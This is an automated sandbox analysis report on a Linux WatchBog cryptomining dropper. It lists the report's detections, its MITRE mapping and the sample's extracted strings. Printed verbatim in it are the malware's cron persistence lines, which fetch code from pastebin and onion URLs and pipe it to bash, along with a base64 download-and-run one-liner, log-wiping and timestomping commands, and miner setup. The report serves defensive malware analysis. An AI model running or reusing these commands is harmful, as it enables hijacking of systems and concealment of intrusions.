
Analysis Report AEjyioBcTB

Overview

General Information

Joe Sandbox Version: 26.0.0 Aquamarine
Analysis ID: 922045
Start date: 25.07.2019
Start time: 13:45:31
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 12m 15s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: AEjyioBcTB
Cookbook file name: defaultlinuxfilecookbook.jbs
Analysis system description: Ubuntu Linux 16.04 x64 (Kernel 4.4.0-116, Firefox 59.0, Document Viewer 3.18.2, LibreOffice 5.1.6.2, OpenJDK 1.8.0_171)
Detection: MAL
Classification: mal96.spre.troj.expl.evad.mine.lin@0/19@14/0
Warnings:
  • Excluded IPs from analysis (whitelisted): 91.189.92.41, 91.189.92.19, 91.189.92.20, 91.189.92.38
  • Excluded domains from analysis (whitelisted): api.snapcraft.io

Detection

Strategy  | Score | Range   | Reporting      | Whitelisted | Detection
Threshold | 96    | 0 - 100 | Report FP / FN | false       | malicious

Key Signatures

Malicious sample detected (through community Yara rule)
Yara detected Linux WatchBog

Classification

Mitre Att&ck Matrix

Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control
Valid Accounts | Local Job Scheduling 11 | Local Job Scheduling 11 | Port Monitors | Web Service 1 | Credential Dumping | Network Service Scanning 1 | Exploitation of Remote Services 1 | Data from Local System | Data Encrypted 1 | Web Service 1
Replication Through Removable Media | Command-Line Interface 1 | Hidden Files and Directories 1 | Accessibility Features | Masquerading 1 | Network Sniffing | Process Discovery 1 | Remote Desktop Protocol 1 | Data from Removable Media | Exfiltration Over Other Network Medium | Standard Cryptographic Protocol 1
Drive-by Compromise | Scripting 1 | Accessibility Features | Path Interception | Hidden Files and Directories 1 | Input Capture | Security Software Discovery 1 | Windows Remote Management | Data from Network Shared Drive | Automated Exfiltration | Standard Non-Application Layer Protocol 2
Exploit Public-Facing Application | Scheduled Task | System Firmware | DLL Search Order Hijacking | File Permissions Modification 1 | Credentials in Files | System Information Discovery 3 | Logon Scripts | Input Capture | Data Encrypted | Standard Application Layer Protocol 12
Spearphishing Link | Command-Line Interface | Shortcut Modification | File System Permissions Weakness | Timestomp 1 | Account Manipulation | Remote System Discovery | Shared Webroot | Data Staged | Scheduled Transfer | Standard Cryptographic Protocol
Spearphishing Attachment | Graphical User Interface | Modify Existing Service | New Service | Scripting 1 | Brute Force | System Owner/User Discovery | Third-party Software | Screen Capture | Data Transfer Size Limits | Commonly Used Port
Spearphishing via Service | Scripting | Path Interception | Scheduled Task | File Deletion 1 | Two-Factor Authentication Interception | Network Sniffing | Pass the Hash | Email Collection | Exfiltration Over Command and Control Channel | Uncommonly Used Port

Signature Overview

Exploits:

Yara detected Linux WatchBog
Source: Yara match | File source: AEjyioBcTB, type: SAMPLE

Bitcoin Miner:

Yara detected Linux WatchBog
Source: Yara match | File source: AEjyioBcTB, type: SAMPLE
Detected Stratum mining protocol
Source: global traffic | TCP traffic: 192.168.1.100:60262 -> 37.59.54.205:80 payload: data raw: [hex dump omitted]
Found strings related to Crypto-Mining
Source: xmrig-notls.149.dr | String found in binary or memory: stratum+tcp://
Source: AEjyioBcTB | String found in binary or memory: rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
Source: config.json.140.dr | String found in binary or memory: "algo": "cryptonight",
Source: xmrig-notls.149.dr | String found in binary or memory: -o, --url=URL URL of mining server
Source: xmrig-notls.149.dr | String found in binary or memory: stratum+tcp://
Source: AEjyioBcTB | String found in binary or memory: rig_path="/tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls"
Source: xmrig-notls.149.dr | String found in binary or memory: Usage: xmrig [OPTIONS]
Source: config.json.140.dr | String found in binary or memory: "url": "pool.minexmr.com:80",
Stdout / stderr contain strings indicative of a mining client
Source: bash "/tmp/AEjyioBcTB" | Stdout: xmrig
Reads CPU information from /sys indicative of miner or evasive malware
Source: ./watchbog (PID: 19753) | Reads CPU info from /sys: /sys/devices/system/cpu/online

Spreading:

Found strings indicative of a multi-platform dropper
Source: AEjyioBcTB | String: echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
Source: AEjyioBcTB | String: (curl -fsSL $room||wget -q -O - $room) > /bin/ftpsdns
Source: AEjyioBcTB | String: key=$( (curl -fsSL $house||wget -q -O - $house) )
Source: AEjyioBcTB | String: echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
Source: AEjyioBcTB | String: echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
Source: AEjyioBcTB | String: echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
Source: AEjyioBcTB | String: echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
Source: AEjyioBcTB | String: echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
Source: AEjyioBcTB | String: (crontab -l 2>/dev/null; echo "*/1 * * * * (curl -fsSL $house||wget -q -O- $house||curl -fsSL $park||wget -q -O - $park||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash > /dev/null 2>&1")| crontab -
Source: AEjyioBcTB | String: pay="(curl -fsSL $house||wget -q -O- $house||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash"
Source: AEjyioBcTB | String: (curl -fsSL $tar_url -o $tar_out||wget -q $tar_url -O $tar_out)
Source: AEjyioBcTB | String: (curl -fsSL $file_url|| wget -q -O - $file_url)| base64 -d > $file_out
Source: AEjyioBcTB | String: (curl -fsSL $deep || wget -q -O - $deep)
Source: AEjyioBcTB | String: (curl -fsSL $surf || wget -q -O - $surf)
Source: AEjyioBcTB | String: update=$( (curl -fsSL $info|| wget -q -O - $info) )
Source: apache.4.dr | String: */7 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: httpntp.4.dr | String: (python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: oanacroane.4.dr | String: (curl -fsSL https://pastebin.com/raw/KJcZ9HLL||wget -q -O - https://pastebin.com/raw/KJcZ9HLL)| base64 -d |bash
Source: root.4.dr | String: */3 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: root0.4.dr | String: */9 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: root1.4.dr | String: */11 * * * * (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash
Source: system.4.dr | String: */6 * * * * root (curl -fsSL https://pastebin.com/raw/EzqVke6X||wget -q -O- https://pastebin.com/raw/EzqVke6X||python -c 'import urllib2 as fbi;print fbi.urlopen("https://pastebin.com/raw/4HvzGfGm").read()'||curl -fsSL https://pastebin.com/raw/3FDDiNwW||wget -q -O - https://pastebin.com/raw/3FDDiNwW||curl -fsSLk https://aziplcr72qjhzvin.onion.to/old.txt||wget -q -O - https://aziplcr72qjhzvin.onion.to/old.txt --no-check-certificate -t 2 -T 60)|bash

Networking:

Connects to a pastebin service (likely for C&C)
Source: unknown | DNS query: name: pastebin.com
Performs DNS lookups
Source: unknown | DNS traffic detected: queries for: pastebin.com
Urls found in memory or binary data
Source: system.4.dr | String found in binary or memory: https://aziplcr72qjhzvin.onion.to/old.txt
Source: system.4.dr | String found in binary or memory: https://pastebin.com/raw/3FDDiNwW
Source: apache.4.dr, httpntp.4.dr, root.4.dr, root0.4.dr, root1.4.dr, system.4.dr | String found in binary or memory: https://pastebin.com/raw/4HvzGfGm
Source: system.4.dr | String found in binary or memory: https://pastebin.com/raw/EzqVke6X
Source: oanacroane.4.dr | String found in binary or memory: https://pastebin.com/raw/KJcZ9HLL
Source: oanacroane.4.dr | String found in binary or memory: https://pastebin.com/raw/KJcZ9HLL)
Uses HTTPS
Source: unknown | Network traffic detected: HTTP traffic on port 55366 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 55370 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 50056
Source: unknown | Network traffic detected: HTTP traffic on port 50056 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55366
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55378
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55368
Source: unknown | Network traffic detected: HTTP traffic on port 55378 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 55370
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 54582
Source: unknown | Network traffic detected: HTTP traffic on port 55368 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 54582 -> 443

System Summary:

Malicious sample detected (through community Yara rule)
Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, type: DROPPED | Matched rule: Detects Monero mining software
Contains symbols with names commonly found in malware
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction0
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction1
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction10
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction100
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction101
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction102
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction103
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction104
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction105
Source: ELF static info symbol of initial sample | Name: CryptonightR_instruction106
Sample contains strings that are potentially command strings
Source: Initial sample | Potential command found: echo $ver
Source: Initial sample | Potential command found: chattr -i /etc/crontab
Source: Initial sample | Potential command found: rm -rf /bin/httpntp /bin/ftpsdns
Source: Initial sample | Potential command found: sed -i '/httpntp/d' /etc/crontab
Source: Initial sample | Potential command found: sed -i '/ftpsdns/d' /etc/crontab
Source: Initial sample | Potential command found: echo -e "(python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" > /bin/httpntp
Source: Initial sample | Potential command found: chmod 755 /bin/httpntp
Source: Initial sample | Potential command found: echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n0 1 * * * root /bin/httpntp\n##" >> /etc/crontab
Source: Initial sample | Potential command found: echo -e "0 1 * * * root /bin/httpntp" >> /etc/crontab
Source: Initial sample | Potential command found: chmod 755 /bin/ftpsdns
Source: Initial sample | Potential command found: echo -e "SHELL=/bin/sh\nPATH=/sbin:/bin:/usr/sbin:/usr/bin\nMAILTO=root\nHOME=/\n# run-parts\n01 * * * * root run-parts /etc/cron.hourly\n02 4 * * * root run-parts /etc/cron.daily\n5 1 * * * root /bin/ftpsdns\n##" >> /etc/crontab
Source: Initial sample | Potential command found: echo -e "5 1 * * * root /bin/ftpsdns" >> /etc/crontab
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/crontab
Source: Initial sample | Potential command found: nohup python -c "import base64;exec(base64.b64decode('[...]
Source: Initial sample | Potential command found: touch /tmp/.tmpk
Source: Initial sample | Potential command found: chattr -i /etc/cron.d/root /etc/cron.d/apache /var/spool/cron/root /var/spool/cron/crontabs/root
Source: Initial sample | Potential command found: rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
Source: Initial sample | Potential command found: mkdir -p /var/spool/cron/crontabs
Source: Initial sample | Potential command found: mkdir -p /etc/cron.hourly
Source: Initial sample | Potential command found: mkdir -p /etc/cron.daily
Source: Initial sample | Potential command found: mkdir -p /etc/cron.monthly
Source: Initial sample | Potential command found: sed -i '/pastebin.com/d' /etc/cron.d/root && sed -i '/##/d' /etc/cron.d/root
Source: Initial sample | Potential command found: sed -i '/pastebin.com/d' /etc/cron.d/apache && sed -i '/##/d' /etc/cron.d/apache
Source: Initial sample | Potential command found: sed -i '/pastebin.com/d' /etc/cron.d/system && sed -i '/##/d' /etc/cron.d/system
Source: Initial sample | Potential command found: sed -i '/pastebin.com/d' /var/spool/cron/crontabs/root && sed -i '/##/d' /var/spool/cron/crontabs/root
Source: Initial sample | Potential command found: sed -i '/pastebin.com/d' /var/spool/cron/root && sed -i '/##/d' /var/spool/cron/root
Source: Initial sample | Potential command found: echo -e "*/3 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/root
Source: Initial sample | Potential command found: echo -e "*/6 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/system
Source: Initial sample | Potential command found: echo -e "*/7 * * * * root (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /etc/cron.d/apache
Source: Initial sample | Potential command found: echo -e "*/9 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/root
Source: Initial sample | Potential command found: echo -e "*/11 * * * * (curl -fsSL $house||wget -q -O- $house||python -c 'import urllib2 as fbi;print fbi.urlopen(\"$room\").read()'||curl -fsSL $park||wget -q -O - $park||curl -fsSLk $beam||wget -q -O - $beam --no-check-certificate -t 2 -T 60)|bash\n##" >> /var/spool/cron/crontabs/root
Source: Initial sample | Potential command found: echo $key > /etc/cron.hourly/oanacroane && chmod 755 /etc/cron.hourly/oanacroane
Source: Initial sample | Potential command found: echo $key > /etc/cron.daily/oanacroane && chmod 755 /etc/cron.daily/oanacroane
Source: Initial sample | Potential command found: echo $key > /etc/cron.monthly/oanacroane && chmod 755 /etc/cron.monthly/oanacroane
Source: Initial sample | Potential command found: touch -acmr /bin/sh /var/spool/cron/root
Source: Initial sample | Potential command found: touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.d/system
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.d/apache
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.d/root
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: Initial sample | Potential command found: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Source: Initial sample | Potential command found: crontab -r
Source: Initial sample | Potential command found: echo " "
Source: Initial sample | Potential command found: echo "cron okay"
Source: Initial sample | Potential command found: echo "Setting up atd backup"
Source: Initial sample | Potential command found: echo "$pay" | at -m now + 1 minute
Source: Initial sample | Potential command found: echo "Setting up custom backup"
Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "crun" | awk '{print $2}'|xargs kill -9
Source: Initial sample | Potential command found: echo -e "$key\n##" > /tmp/crun && chmod 777 /tmp/crun && cd /tmp/
Source: Initial sample | Potential command found: nohup ./crun >/dev/null 2>&1 &
Source: Initial sample | Potential command found: sleep 15
Source: Initial sample | Potential command found: rm /tmp/crun
Source: Initial sample | Potential command found: mkdir -p $temp_path/dataoutput/
Source: Initial sample | Potential command found: cd $temp_path
Source: Initial sample | Potential command found: tar $tar_flag $tar_out -C $temp_path/dataoutput/
Source: Initial sample | Potential command found: mv $rig_path $output
Source: Initial sample | Potential command found: cd $base_path
Source: Initial sample | Potential command found: rm -rf $temp_path
Source: Initial sample | Potential command found: mkdir -p $path
Source: Initial sample | Potential command found: rm -rf $path/*
Source: Initial sample | Potential command found: chattr -i $path/*
Source: Initial sample | Potential command found: rm -rf $path/config.json $path/watchbog
Source: Initial sample | Potential command found: cd $path
Source: Initial sample | Potential command found: chmod 777 $path/watchbog
Source: Initial sample | Potential command found: nohup ./watchbog >/dev/null 2>&1 &
Source: Initial sample | Potential command found: rm -rf $path/config.json $path/watchbog $path/config.txt $path/cpu.txt $path/pools.txt
Source: Initial sample | Potential command found: chmod 777 $path/config.txt
Source: Initial sample | Potential command found: chmod 777 $path/cpu.txt
Source: Initial sample | Potential command found: chmod 777 $path/pools.txt
Source: Initial sample | Potential command found: rm -rf $path/cpu.txt $path/pools.txt $path/config.txt
Source: Initial sample | Potential command found: touch /tmp/.tmpc
Source: Initial sample | Potential command found: echo "An update exists boss"
Source: Initial sample | Potential command found: echo "NO update exists boss"
Source: Initial sample | Potential command found: ps auxf|grep -v grep|grep "watchbog" | awk '{print $2}'|xargs kill -9
Source: Initial sample | Potential command found: ps aux | grep -v '/boot/vmlinuz' | awk '{if($3>30.0) print $2}' | while read procid; do kill -9 $procid; done
Source: Initial sample | Potential command found: pkill -f watchbog
Source: Initial sample | Potential command found: echo "$check file exist"
Source: Initial sample | Potential command found: echo "cleaning up file $check"
Source: Initial sample | Potential command found: rm -rf $check
Source: Initial sample | Potential command found: echo "I am $me"
Source: Initial sample | Potential command found: echo "It's running boss"
Source: Initial sample | Potential command found: crontab -r
Source: Initial sample | Potential command found: echo "Setting Up Sys Cron"
Source: Initial sample | Potential command found: sleep 30
Source: Initial sample | Potential command found: echo 0>/var/spool/mail/root
Source: Initial sample | Potential command found: echo 0>/var/log/wtmp
Source: Initial sample | Potential command found: echo 0>/var/log/secure
Source: Initial sample | Potential command found: echo 0>/var/log/cron
Source: Initial sample | Potential command found: sed -i '/pastebin/d' /var/log/syslog
Source: Initial sample | Potential command found: sed -i '/github/d' /var/log/syslog
Source: Initial sample | Potential command found: touch /tmp/.tmplassstgggzzzqpppppp12233333
Source: Initial sample | Potential command found: echo "KGN1cmwgLWZzU0xrIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9XMVlrcnFIa3x8d2dldCAtcSAtTyAtIGh0dHBzOi8vcGFzdGViaW4uY29tL3Jhdy9XMVlrcnFIayl8YmFzaAo="|base64 -d|bash
Yara signature match
Source: /tmp/.tmpdropoff/dataoutput/xmrig-2.14.1/xmrig-notls, type: DROPPED | Matched rule: XMRIG_Monero_Miner date = 2018-01-04, hash4 = 0972ea3a41655968f063c91a6dbd31788b20e64ff272b27961d12c681e40b2d2, hash3 = f3f2703a7959183b010d808521b531559650f6f347a5830e47f8e3831b10bad5, hash2 = 08b55f9b7dafc53dfc43f7f70cdd7048d231767745b76dc4474370fb323d7ae7, hash1 = 5c13a274adb9590249546495446bb6be5f2a08f9dcd2fc8a2049d9dc471135c0, author = Florian Roth, description = Detects Monero mining software, reference = https://github.com/xmrig/xmrig/releases, license = https://creativecommons.org/licenses/by-nc/4.0/
Classification label
Source: classification engine | Classification label: mal96.spre.troj.expl.evad.mine.lin@0/19@14/0

Persistence and Installation Behavior:

Explicitly modifies time stamps using the "touch" command
Source: /bin/bash (PID: 19363) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 19494) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 19495) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19496) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/system
Source: /bin/bash (PID: 19497) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 19498) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 19500) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19503) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19507) | Touch executable uses timestamp modification options: touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Sample tries to persist itself using cron
Source: /bin/bash (PID: 19147) | File: /etc/crontab
Source: /bin/bash (PID: 19147) | File: /etc/cron.d/root
Source: /bin/bash (PID: 19147) | File: /etc/cron.d/system
Source: /bin/bash (PID: 19147) | File: /etc/cron.d/apache
Source: /bin/bash (PID: 19147) | File: /var/spool/cron/root
Source: /bin/bash (PID: 19147) | File: /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19147) | File: /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19147) | File: /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19147) | File: /etc/cron.monthly/oanacroane
Source: /bin/sed (PID: 19308) | File: /etc/crontab
Source: /bin/sed (PID: 19310) | File: /etc/crontab
Sets full permissions to files and/or directories
Source: /bin/bash (PID: 19749) | Chmod executable with 777: /bin/chmod -> chmod 777 /bin/watchbog
Creates hidden files and/or directories
Source: /bin/mkdir (PID: 19689) | Directory: .tmpdropoff
Enumerates processes within the "proc" file system
Executes the "chmod" command used to modify permissions
Source: /bin/bash (PID: 19324)Chmod executable: /bin/chmod -> chmod 755 /bin/httpntp
Source: /bin/bash (PID: 19362)Chmod executable: /bin/chmod -> chmod 755 /bin/ftpsdns
Source: /bin/bash (PID: 19491)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19492)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19493)Chmod executable: /bin/chmod -> chmod 755 /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19749)Chmod executable: /bin/chmod -> chmod 777 /bin/watchbog
Executes the "curl" command used to transfer data via the network (typically using HTTP/S)
Source: /bin/bash (PID: 19335)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/4HvzGfGm
Source: /bin/bash (PID: 19462)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/EzqVke6X
Source: /bin/bash (PID: 19642)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/dXD2Bs0H
Source: /bin/bash (PID: 19691)Curl executable: /usr/bin/curl -> curl -fsSL https://github.com/xmrig/xmrig/releases/download/v2.14.1/xmrig-2.14.1-xenial-x64.tar.gz -o /tmp/.tmpdropoff/rig.tar.gz
Source: /bin/bash (PID: 19839)Curl executable: /usr/bin/curl -> curl -fsSL https://pastebin.com/raw/LUN80Hj8
Executes the "grep" command used to find patterns in files or piped streams
Source: /bin/bash (PID: 19264)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19265)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 19523)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19524)Grep executable: /bin/grep -> grep -v grep
Source: /bin/bash (PID: 19803)Grep executable: /bin/grep -> grep watchbog
Source: /bin/bash (PID: 19804)Grep executable: /bin/grep -> grep -v grep
Executes the "mkdir" command used to create folders
Source: /bin/bash (PID: 19366)Mkdir executable: /bin/mkdir -> mkdir -p /var/spool/cron/crontabs
Source: /bin/bash (PID: 19367)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.hourly
Source: /bin/bash (PID: 19368)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.daily
Source: /bin/bash (PID: 19370)Mkdir executable: /bin/mkdir -> mkdir -p /etc/cron.monthly
Source: /bin/bash (PID: 19689)Mkdir executable: /bin/mkdir -> mkdir -p /tmp/.tmpdropoff//dataoutput/
Executes the "nohup" (no hangup) command used to keep a background process from being killed when its terminal closes
Source: /bin/bash (PID: 19753)Nohup executable: /usr/bin/nohup -> nohup ./watchbog
Executes the "ps" command used to list the status of processes
Source: /bin/bash (PID: 19263)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 19522)Ps executable: /bin/ps -> ps -fe
Source: /bin/bash (PID: 19802)Ps executable: /bin/ps -> ps -fe
Executes the "rm" command used to delete files or directories
Source: /bin/bash (PID: 19307)Rm executable: /bin/rm -> rm -rf /bin/httpntp /bin/ftpsdns
Source: /bin/bash (PID: 19365)Rm executable: /bin/rm -> rm -rf /etc/cron.hourly/oanacroane /etc/cron.daily/oanacroane /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19636)Rm executable: /bin/rm -> rm -rf /bin/config.json /bin/watchbog
Source: /bin/bash (PID: 19744)Rm executable: /bin/rm -> rm -rf /tmp/.tmpdropoff/
Executes the "touch" command used to create files or modify time stamps
Source: /bin/bash (PID: 19363)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/crontab
Source: /bin/bash (PID: 19494)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/root
Source: /bin/bash (PID: 19495)Touch executable: /bin/touch -> touch -acmr /bin/sh /var/spool/cron/crontabs/root
Source: /bin/bash (PID: 19496)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/system
Source: /bin/bash (PID: 19497)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/apache
Source: /bin/bash (PID: 19498)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.d/root
Source: /bin/bash (PID: 19500)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.hourly/oanacroane
Source: /bin/bash (PID: 19503)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.daily/oanacroane
Source: /bin/bash (PID: 19507)Touch executable: /bin/touch -> touch -acmr /bin/sh /etc/cron.monthly/oanacroane
Source: /bin/bash (PID: 19849)Touch executable: /bin/touch -> touch /tmp/.tmpc
Reads system information from the proc file system
Source: /bin/ps (PID: 19263)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19263)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 19522)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19522)Reads from proc file: /proc/stat
Source: /bin/ps (PID: 19802)Reads from proc file: /proc/meminfo
Source: /bin/ps (PID: 19802)Reads from proc file: /proc/stat
Sample tries to set the executable flag
Source: /bin/chmod (PID: 19324)File: /bin/httpntp (bits: - usr: rx grp: rx all: rwx)
Source: /bin/chmod (PID: 19362)File: /bin/ftpsdns (bits: - usr: rx grp: rx all: rwx)
